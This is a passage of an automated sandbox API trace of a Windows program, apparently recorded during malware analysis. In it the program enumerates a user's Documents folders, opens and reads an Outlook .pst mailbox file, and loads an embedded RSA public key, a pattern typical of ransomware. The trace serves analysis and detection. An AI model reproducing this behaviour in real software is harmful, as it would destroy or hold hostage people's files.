lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.763] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0192.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.764] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.764] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.765] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.766] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0192.766] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0192.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0192.767] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.768] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0192.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0192.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0192.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.771] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Music\\") returned="My Music\\" [0192.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0192.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3c48 [0192.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.772] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0192.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3c48 | out: hHeap=0x2c0000) returned 1 [0192.772] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.773] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.773] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.773] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.773] PathFindFileNameW (pszPath="") returned="" [0192.773] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0192.774] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Music\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my music\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 0xffffffff [0192.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0192.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0192.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0192.778] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.778] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.778] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\") returned="My Pictures\\" [0192.778] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0192.778] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.778] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.779] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.779] PathFindFileNameW (pszPath="") returned="" [0192.779] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my pictures\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 0xffffffff [0192.779] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.779] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.779] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.779] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\") returned="My Videos\\" [0192.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0192.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.780] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.780] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.780] PathFindFileNameW (pszPath="") returned="" [0192.780] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my videos\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9bc8f80, ftCreationTime.dwHighDateTime=0x1d899ea, ftLastAccessTime.dwLowDateTime=0xa94857a0, ftLastAccessTime.dwHighDateTime=0x1d89e5c, ftLastWriteTime.dwLowDateTime=0xa94857a0, ftLastWriteTime.dwHighDateTime=0x1d89e5c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ySw9UDFA", cAlternateFileName="")) returned 0xffffffff [0192.780] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0192.780] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0192.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0192.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0192.780] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0192.780] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0192.781] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0192.781] PathFindFileNameW (pszPath="") returned="" [0192.781] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0192.781] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0192.781] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 1 [0192.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0192.782] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.782] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst") returned=".pst" [0192.782] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0192.783] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=271360) returned 1 [0192.783] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0192.788] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x423da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.788] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.789] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.789] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x25805, lpOverlapped=0x0) returned 1 [0192.796] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.797] lstrlenA (lpString="-----BEGIN PUBLIC 